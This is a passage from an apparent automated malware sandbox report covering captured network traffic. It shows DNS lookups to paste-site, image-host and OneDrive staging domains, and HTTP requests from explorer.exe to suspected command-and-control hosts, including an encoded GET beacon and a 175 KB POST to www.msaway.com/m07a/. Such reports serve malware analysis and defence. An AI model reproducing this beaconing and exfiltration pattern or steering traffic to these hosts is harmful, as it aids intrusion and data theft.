                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:13.976872921 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.187448978 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.187582970 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.189413071 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399900913 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399923086 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399933100 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399939060 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399944067 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399950027 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.399991989 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.400096893 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610764980 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610785007 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610795975 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610809088 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610853910 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610865116 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610876083 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610882998 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610930920 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610963106 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.611068964 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821480036 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821507931 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821520090 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821531057 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821541071 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821600914 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821667910 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821696043 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821734905 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821762085 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821854115 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821861982 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821927071 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821938038 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821943998 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821949005 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821986914 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.822021961 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.822031975 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.822045088 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033297062 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033319950 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033332109 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033344984 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033358097 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033371925 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033382893 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033395052 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033488989 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033534050 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033596992 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033610106 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033679008 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033725023 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033796072 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033808947 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033883095 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033930063 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.033986092 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034006119 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034085035 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034128904 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034188032 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.034271002 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039026022 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039052963 CEST8049742217.160.0.95192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039113998 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039164066 CEST4974280192.168.2.4217.160.0.95
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.805591106 CEST4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.805820942 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909043074 CEST8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909077883 CEST8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909187078 CEST4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909346104 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909358025 CEST8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:25.909415960 CEST4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.158463001 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.312602043 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.312712908 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.314519882 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.468338966 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.468473911 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.470015049 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.624666929 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.624682903 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.625297070 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.779685974 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.779830933 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.780129910 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.780426979 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.780935049 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781061888 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781337023 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781384945 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781424046 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.781632900 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.782128096 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.785870075 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.935244083 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.935260057 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.935914993 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.936078072 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.936671972 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.937077045 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.937679052 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.938004017 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.938357115 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.938982964 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.939373970 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.939384937 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.939485073 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.939557076 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.939919949 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.940273046 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.940841913 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.092505932 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.092576981 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.093103886 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.232353926 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.232368946 CEST8049743203.161.57.217192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.232398033 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:53.232443094 CEST4974380192.168.2.4203.161.57.217
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.273080111 CEST4974480192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.376864910 CEST80497443.33.130.190192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.376950979 CEST4974480192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.377088070 CEST4974480192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.480757952 CEST80497443.33.130.190192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.867706060 CEST4974480192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:14.012201071 CEST80497443.33.130.190192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:15.884354115 CEST4974580192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:16.899806023 CEST4974580192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:18.930025101 CEST4974580192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:20.561682940 CEST80497443.33.130.190192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:20.563843966 CEST4974480192.168.2.43.33.130.190
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:22.930072069 CEST4974580192.168.2.43.33.130.190

                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.142556906 CEST5227353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.250435114 CEST53522731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.786118031 CEST5894053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.894762039 CEST53589401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.120626926 CEST6284653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:26.193128109 CEST5190153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.353060007 CEST5980753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.522789001 CEST53598071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:32.602691889 CEST5208053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:32.713190079 CEST53520801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:51.994155884 CEST5491553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.157130957 CEST53549151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.058274031 CEST6003453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST53600341.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.142556906 CEST192.168.2.41.1.1.10xdecbStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.786118031 CEST192.168.2.41.1.1.10x17a2Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.120626926 CEST192.168.2.41.1.1.10xfd5cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:26.193128109 CEST192.168.2.41.1.1.10xcb28Standard query (0)htdgia.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.353060007 CEST192.168.2.41.1.1.10xbd26Standard query (0)www.msaway.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:32.602691889 CEST192.168.2.41.1.1.10xc406Standard query (0)www.shakishaskakes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:51.994155884 CEST192.168.2.41.1.1.10x2435Standard query (0)www.xasvcd.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.058274031 CEST192.168.2.41.1.1.10xd996Standard query (0)www.lunazone.usA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.250435114 CEST1.1.1.1192.168.2.40xdecbNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:14.250435114 CEST1.1.1.1192.168.2.40xdecbNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.894762039 CEST1.1.1.1192.168.2.40x17a2No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:17.894762039 CEST1.1.1.1192.168.2.40x17a2No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.226953030 CEST1.1.1.1192.168.2.40xfd5cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.226953030 CEST1.1.1.1192.168.2.40xfd5cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.226953030 CEST1.1.1.1192.168.2.40xfd5cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.226953030 CEST1.1.1.1192.168.2.40xfd5cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:25.226953030 CEST1.1.1.1192.168.2.40xfd5cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:26.450829029 CEST1.1.1.1192.168.2.40xcb28No error (0)htdgia.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:26.450829029 CEST1.1.1.1192.168.2.40xcb28No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:32.599553108 CEST1.1.1.1192.168.2.40x7734No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:32.599553108 CEST1.1.1.1192.168.2.40x7734No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:33.536391973 CEST1.1.1.1192.168.2.40x6c7cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:33.536391973 CEST1.1.1.1192.168.2.40x6c7cNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:45.777978897 CEST1.1.1.1192.168.2.40x196aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:11:45.777978897 CEST1.1.1.1192.168.2.40x196aNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.522789001 CEST1.1.1.1192.168.2.40xbd26No error (0)www.msaway.com217.160.0.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:32.713190079 CEST1.1.1.1192.168.2.40xc406Name error (3)www.shakishaskakes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.157130957 CEST1.1.1.1192.168.2.40x2435No error (0)www.xasvcd.xyz203.161.57.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)www.lunazone.uslunazone.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)lunazone.us3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Apr 18, 2024 21:13:13.272274971 CEST1.1.1.1192.168.2.40xd996No error (0)lunazone.us15.197.148.33A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                • paste.ee
                                                                                                                                                                                                                                                                • uploaddeimagens.com.br
                                                                                                                                                                                                                                                                • onedrive.live.com
                                                                                                                                                                                                                                                                • www.msaway.com
                                                                                                                                                                                                                                                                • www.xasvcd.xyz
                                                                                                                                                                                                                                                                • www.lunazone.us

                                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.449740217.160.0.95802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.732719898 CEST155OUTGET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.msaway.com
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:11.946221113 CEST740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                Content-Length: 596
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:12:11 GMT
                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.449742217.160.0.95802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.189413071 CEST12890OUTPOST /m07a/ HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.msaway.com
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 175500
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Origin: http://www.msaway.com
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Referer: http://www.msaway.com/m07a/
                                                                                                                                                                                                                                                                Accept-Language: en-US
